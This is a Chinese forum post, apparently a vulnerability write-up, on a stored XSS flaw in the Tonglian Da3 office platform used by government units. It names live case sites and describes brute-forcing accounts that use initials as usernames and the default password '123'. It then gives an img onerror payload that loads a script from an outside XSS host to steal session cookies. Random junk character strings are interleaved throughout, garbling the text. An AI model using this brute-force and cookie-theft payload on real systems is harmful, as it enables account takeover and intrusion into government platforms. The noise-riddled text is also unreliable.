' q7 }7 ]3 q( D; T p
% {, X' o: k0 m$ [ ?' f
同联Da3协同办公平台后台通用储存型xss漏洞: n; w' o4 i1 h
1 ]' Q' v' r: w, I# }- {+ u
# V* |) G1 `. A 平台简介:
2 Q/ m! f, B% K# e% X+ G# j
$ A+ Q( Y$ ~; X
" y7 O5 l' r' \; @, h/ ? ! @( f# n8 X8 E$ u
0 r; A# J* O1 W/ |
Q# j7 K. u ]' G
北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
2 w) m4 w$ E7 {4 g& v
同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
- d0 C* J o. K! o. `- Q' F# }: u同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!
7 T& ~: w# | ?1 v W* j" w+ ?: ^
- A+ K. h( ]( q0 f& g g
/ B* j1 l8 {. h) R- v! ~9 \
/ V, g! E( R" \' \- A% e) N
1 v* s7 Q3 t3 P+ g, o8 a, w/ L' V$ s" A g
6 m4 q, R/ V% v- B4 M
由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:+ @8 i8 K# f$ c
" t! Q$ L6 b6 s9 i! Y# i- \2 X / w' ?$ t& k! S* ]3 U
6 P f# r6 k2 d3 J6 }
! I& D5 ?* }' _, P: g, C/ X6 i* F5 j 1 x f4 i3 [( v( s% U7 t% ]. x8 K
http://1.1.1.1:7197/cap-aco/#(案例2-)
4 \; b* K, e& h6 `7 s% X. K0 v
9 H( d5 u- g" s8 i: N2 f$ t
+ P$ K9 F0 U' _/ i5 E http://www.XXOO.com (案例1-官网网站)
2 I3 H$ S' k! N
2 q* t0 R: k) l8 L# D: a
$ b4 a+ y+ a/ W; @ 漏洞详情:
7 U Y# w0 y3 F! a2 V2 b1 Q
+ X2 ?2 h Y, S! u3 r* i. {
4 N$ ~3 p! k# I0 g5 z
案例一、
- ^: r# B& a P7 k$ h
$ @" ]7 @2 g% d - ?8 I& {/ V2 ]! R1 N- @
初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试
4 U: r& n: [8 l& e, `3 D
6 \: w( Z8 X* J9 Q8 M5 }3 i! E , u: P* J0 t$ e! `- \& l3 y5 N" K
首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:
4 s2 K3 _8 J1 v- G* ^
& f3 S: _' s! w6 h' J 8 p. ~7 |) Z8 r1 R1 \
' H7 ?& ?7 _) [
; h6 T0 m" }4 m & h" C9 M& F# T; m# `" J# I
5 j Z# o) v! V0 a
% _) G" m& b/ ^4 P. r+ w
+ t4 W: j7 t& ?: ^ status为302即表示破解成功,然后找个破解成功的账号登录系统。然后在通知公告---通知公告发布-拟稿处存在储存型xss漏洞,我在编机器里填写好标题、选择人员,点html如图: 1 x b6 E/ K$ t+ m* Q; N! u% k* ]
) b J; B; z& L" f- f% D' Q l% A ) t7 B' N0 q0 N) w) T
# V: W \: B3 k
. F% m4 |! C* f# |5 h$ R
7 `) K0 k" G4 d/ E9 v$ O7 w
+ W2 H5 M0 [) f+ g# @" g
) U/ X6 |5 ]! p) F" K
! n. l" d3 X/ y" p; r3 j' t+ m 然后插我们的xss跨站代码(经过测试发现过滤了好多标签,比如script,没过滤img、iframe标签),这里我们用img标签来测试,payload如下
: y; X3 c$ P/ F* I- N8 n9 _6 X. I8 A0 \
9 K! r3 c( ]' }4 p
9 p C/ E4 v# H5 z1 d # I6 [$ g: A: x! k3 r5 Q: {: |$ n* Y
2 k0 m$ [. f; p3 |1 [4 V ! Z8 H" f$ N: I" W7 V9 b4 g( V
<img src=x8 d: r5 G$ j7 E S% d6 k
onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.6kb.org/7OO7GQ?1510065652';>,如图: % X$ L: \8 q+ c4 Q8 M( {
`! d0 ^0 c4 G( }0 E& r1 r * z: _! d6 ~( L6 S+ R
; }* i4 }# G) [
- B. _$ W2 J0 [5 Y! Y0 A , W8 \ E+ T' h3 ]! f& S
然后发送,接收cookie如图: & u/ s. ~: h3 h+ d3 H; ?% U( u) Q
# T3 p# R* T: E! O9 l5 Q
) ~1 j( r- M2 N / E& p. W* {! O) Y- Z
! m( X1 o; E$ t6 n
( t5 W4 t# B5 x: }6 N o
/ V( ^( V3 b& v1 T
$ i9 Q' i1 U$ f1 @
" t2 X7 a# b, l# i' a
* D! Q% W6 _6 ~# D( l, Q
4 e" d# _% X2 W5 [
# D& X9 O6 G: m8 X* |2 @ l1 o 9 l L% l* U5 A% E
' |# ]" U' D$ `8 w( s' O2 Q
2 [, Z2 |/ i) q2 _" K
3 u% D7 C& i' S+ E4 ^
& l( _8 a, k* x' g
- v1 U5 n/ O3 E7 y 
* a; ~ v; p9 Q1 i c
8 l% x# K0 f& }" r
# g9 A) T; @6 A1 A2 u
% C' D0 x) y9 Q" Q
8 }2 Q* F+ z; _
4 N- N; m I7 C 案例2、
- {) ]2 ?& D4 P* q
- E ~1 D& N6 i* L4 a
; p: d3 o" I% d' m# I$ e
前面步骤都一样,下面看效果图: . B5 K6 N6 i9 {# D7 R
S. U3 h( a4 O# N* M8 N: y4 v1 F . N7 g3 b8 a; x# r5 u- ^6 a- n
: y6 F- |& I% R) q# V- N
1 k z3 Y {! R7 E$ w! d0 Q3 ^, e7 P
# L$ e7 }5 d7 |. ~8 X 
% X! [& x: b6 b! f. m" c0 z
) b4 g/ P7 ^/ F4 o
2 i6 m5 X% H: p& g0 Y, x( I4 M
# `1 @1 Z. z4 A, |6 W
8 n- X7 w9 c4 f4 O, G6 A+ s. A) a8 M4 K
i3 E/ F8 D& A% u! r# T# e! W 2 Z8 B. i3 l( E8 W1 z7 ]
- p# t0 ?5 N! x7 }$ ]1 D/ j
, [; B6 e1 l$ D! Q
" Q$ ~- W5 c7 N
, h+ K+ e9 v2 ]* v; g. F
% A5 E! G4 W W/ l6 R
, X/ l( O. u/ o) R- |8 K [
' U9 W3 N' [1 K$ V! _+ k& B: ~ R
1 l3 o, [: R0 o7 d1 L/ ~4 N! u
9 A) g/ V3 i( E
7 s! t" z* [# x9 w
) l; C# u' a5 t* r) u: K ( G' b8 M( Y2 S# c3 K
& U* g; k% B0 e, C5 M# T
" ?/ ^( F% J# ~4 {
/ F& D: N9 t& J* [8 O8 M
. L' c2 F# f: g5 F3 A 
发表于 2018-10-20 20:14:15
收藏
支持
反对